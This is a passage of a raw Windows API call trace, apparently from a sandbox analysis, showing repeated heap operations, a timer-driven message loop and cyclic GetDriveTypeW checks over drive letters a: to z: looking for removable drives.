0x14bd2f8 [0214.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0214.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.796] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.796] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.796] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.796] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.796] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.796] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.797] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.798] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.798] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.798] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0214.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.799] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.800] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.800] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.800] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.800] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0214.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0214.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0214.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.801] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.801] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.801] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.801] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.801] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.801] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.802] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.802] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.802] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.802] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.802] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.802] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.803] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.804] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.804] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.804] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.804] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.804] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.804] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.805] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.805] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.805] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.805] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.805] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.805] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.806] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0214.806] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.806] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0214.807] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0214.807] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.807] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.807] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0214.807] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0214.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.807] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.808] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.808] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.808] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.808] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.808] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.808] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.809] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.809] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.809] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.809] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.809] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.810] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.811] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.812] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.812] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.812] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.812] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.812] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.812] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.812] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0214.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0214.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0214.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.813] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.813] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.814] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.814] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.814] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 